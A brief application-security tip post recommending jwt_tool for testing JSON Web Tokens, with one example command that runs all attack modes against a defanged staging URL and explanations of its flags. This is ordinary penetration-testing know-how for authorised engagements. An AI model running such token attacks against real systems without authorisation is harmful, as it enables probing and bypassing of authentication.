# Week 40 - JWT Testing

Looking for a quick way to test JSON Web Tokens (JWT's) during an [#AppSec](https://www.linkedin.com/feed/hashtag/?keywords=appsec\&highlightedUpdateUrns=urn%3Ali%3Aactivity%3A6988868624044191744) engagement?\
&#x20;\
I highly recommend using jwt\_tool! To get it running, just locate a GET request to an authenticated endpoint that uses a JWT in the Authorization header. Then run the following command:\
&#x20;\
`python3`[`jwt_tool.py`](http://jwt_tool.py) `-M at -t "https[:]//staging[.]client[.]com/api/v3/endpoint" -rh "Authorization: Bearer eyJ0eHAiCiJKV1QiLCJhbGciO…<more>"`\
&#x20;\
The -M option sets the attack mode; in the above case we set ‘at’ for all tests. The -t option is the target URL. The -rh allows us to specify request headers, in this case, the Authorization request header containing the JWT.\
&#x20;\
Then let it rip! It will auto-magically test common exploits, claim fuzzing, token misconfigurations, etc. Leaving you more time for that Business Logic!\
&#x20;\
Let me know what tools you use for [#JWT](https://www.linkedin.com/feed/hashtag/?keywords=jwt\&highlightedUpdateUrns=urn%3Ali%3Aactivity%3A6988868624044191744) testing in the comments below.

![](https://3053998085-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FxZo6Sim2dDXChJQAtNXN%2Fuploads%2FCskwzly4UfTvti54pLMT%2Fimage.png?alt=media\&token=deabc4db-38e6-4b66-92e3-90b4c795a0f8)